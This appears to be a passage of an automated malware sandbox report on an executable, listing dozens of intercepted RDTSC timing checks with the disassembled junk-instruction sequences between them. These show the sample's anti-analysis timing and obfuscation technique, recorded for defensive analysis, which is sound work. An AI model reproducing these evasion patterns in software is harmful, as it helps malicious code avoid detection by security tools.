              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5F196 second address: C5F1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC040F64401h 0x00000009 jmp 00007FC040F64405h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BF3B54 second address: BF3B58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BF3B58 second address: BF3B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC040F64407h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C687E6 second address: C687F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007FC0410B9FAAh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C687F9 second address: C687FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C687FD second address: C6880B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FC0410B9FA6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D124 second address: C6D12D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D12D second address: C6D143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC0410B9FA6h 0x0000000a jnc 00007FC0410B9FA6h 0x00000010 popad 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D143 second address: C6D151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC040F643F6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D151 second address: C6D19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC0410B9FA6h 0x0000000a jne 00007FC0410B9FA6h 0x00000010 jmp 00007FC0410B9FB6h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a jl 00007FC0410B9FA6h 0x00000020 pop eax 0x00000021 jmp 00007FC0410B9FB7h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D2FF second address: C6D310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC040F643FCh 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D310 second address: C6D346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC0410B9FA6h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FC0410B9FB9h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jno 00007FC0410B9FA8h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D346 second address: C6D34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D4C5 second address: C6D4C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D615 second address: C6D630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC040F643F6h 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jl 00007FC040F643FEh 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D79D second address: C6D7A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D7A3 second address: C6D7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 jnl 00007FC040F643F6h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D7B6 second address: C6D7BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D8FF second address: C6D905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D905 second address: C6D935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC0410B9FABh 0x00000008 pop eax 0x00000009 push edi 0x0000000a jo 00007FC0410B9FA6h 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007FC0410B9FB2h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D935 second address: C6D93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D93B second address: C6D94F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC0410B9FABh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D94F second address: C6D955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6DABD second address: C6DAD1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC0410B9FA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FC0410B9FA6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C18EA9 second address: C18EB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6CBE2 second address: C6CBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6CBEC second address: C6CBFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 ja 00007FC040F643F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6CBFA second address: C6CC06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC0410B9FA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C74159 second address: C7415D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C7415D second address: C74179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FC0410B9FB6h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C74179 second address: C7417D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C73182 second address: C73186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C73186 second address: C731A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F64400h 0x00000007 jmp 00007FC040F643FAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C72C79 second address: C72C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007FC0410B9FC6h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C72C87 second address: C72C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C72C8F second address: C72C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FC0410B9FA6h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C739D2 second address: C739DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC040F643F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C739DE second address: C739F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FC0410B9FA8h 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C739F2 second address: C73A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC040F643F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C73A01 second address: C73A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C73A05 second address: C73A0B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C73B9F second address: C73BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C73BA3 second address: C73BC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F643FAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007FC040F643F6h 0x00000012 jl 00007FC040F643F6h 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C73BC4 second address: C73BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FC0410B9FACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C78A68 second address: C78A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C78A6D second address: C78A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FC0410B9FB6h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3092D second address: C30933 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C30933 second address: C30938 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C31020 second address: C31038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC040F643FFh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C31038 second address: C3108E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC0410B9FACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jnp 00007FC0410B9FAAh 0x00000014 pop eax 0x00000015 js 00007FC0410B9FACh 0x0000001b mov edx, dword ptr [ebp+122D2B02h] 0x00000021 jns 00007FC0410B9FACh 0x00000027 call 00007FC0410B9FA9h 0x0000002c pushad 0x0000002d jmp 00007FC0410B9FADh 0x00000032 js 00007FC0410B9FACh 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3108E second address: C310F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007FC040F643FFh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FC040F64401h 0x00000014 popad 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push ebx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e jng 00007FC040F643F6h 0x00000024 popad 0x00000025 pop ebx 0x00000026 mov eax, dword ptr [eax] 0x00000028 pushad 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e popad 0x0000002f push edi 0x00000030 pushad 0x00000031 popad 0x00000032 pop edi 0x00000033 popad 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FC040F64403h 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C310F3 second address: C31108 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C31108 second address: C3110D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C31325 second address: C31329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C31418 second address: C31430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F64404h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C31430 second address: C3143A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FC0410B9FA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3191C second address: C31934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F643FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C31D5A second address: C31D80 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC0410B9FA8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC0410B9FB7h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C31D80 second address: C31DF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F64405h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FC040F643F8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 js 00007FC040F643FEh 0x0000002a pushad 0x0000002b mov cx, dx 0x0000002e and bh, FFFFFFF0h 0x00000031 popad 0x00000032 lea eax, dword ptr [ebp+1247C693h] 0x00000038 nop 0x00000039 jmp 00007FC040F64405h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FC040F64400h 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C31DF6 second address: C31DFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C31DFD second address: C18EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 cmc 0x00000009 lea eax, dword ptr [ebp+1247C64Fh] 0x0000000f mov dx, BA30h 0x00000013 push eax 0x00000014 pushad 0x00000015 jmp 00007FC040F643FEh 0x0000001a push eax 0x0000001b jg 00007FC040F643F6h 0x00000021 pop eax 0x00000022 popad 0x00000023 mov dword ptr [esp], eax 0x00000026 sub dword ptr [ebp+122D2CABh], ebx 0x0000002c call dword ptr [ebp+1244C36Bh] 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 push edi 0x00000036 pop edi 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C31042 second address: C3108E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jnp 00007FC0410B9FAAh 0x00000010 push eax 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop eax 0x00000014 pop eax 0x00000015 js 00007FC0410B9FACh 0x0000001b mov edx, dword ptr [ebp+122D2B02h] 0x00000021 jns 00007FC0410B9FACh 0x00000027 call 00007FC0410B9FA9h 0x0000002c pushad 0x0000002d jmp 00007FC0410B9FADh 0x00000032 js 00007FC0410B9FACh 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C7B6B0 second address: C7B6B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C7B6B4 second address: C7B6C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jg 00007FC0410B9FA6h 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C7B6C6 second address: C7B6CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C7B985 second address: C7B98D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C7B98D second address: C7B991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C7DFA1 second address: C7DFA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C7DFA5 second address: C7DFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C7DFAB second address: C7DFCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d je 00007FC0410B9FCDh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC0410B9FAFh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C7DFCF second address: C7DFD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C83C29 second address: C83C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C8309F second address: C830BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC040F64406h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C83787 second address: C83797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jg 00007FC0410B9FA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BF2065 second address: BF206E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C864D5 second address: C8650C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC0410B9FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC0410B9FABh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC0410B9FB1h 0x00000017 jc 00007FC0410B9FAEh 0x0000001d pushad 0x0000001e popad 0x0000001f jo 00007FC0410B9FA6h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C8669F second address: C866A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C866A4 second address: C866B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC0410B9FA6h 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C86AFE second address: C86B04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C86B04 second address: C86B57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC0410B9FADh 0x00000008 jmp 00007FC0410B9FB5h 0x0000000d js 00007FC0410B9FA6h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push esi 0x00000017 push eax 0x00000018 jbe 00007FC0410B9FA6h 0x0000001e jmp 00007FC0410B9FB9h 0x00000023 pop eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C8B5B7 second address: C8B5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C8B994 second address: C8B99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C8B99A second address: C8B9C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC040F64400h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jl 00007FC040F643F6h 0x00000013 jnc 00007FC040F643F6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C932B5 second address: C932BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
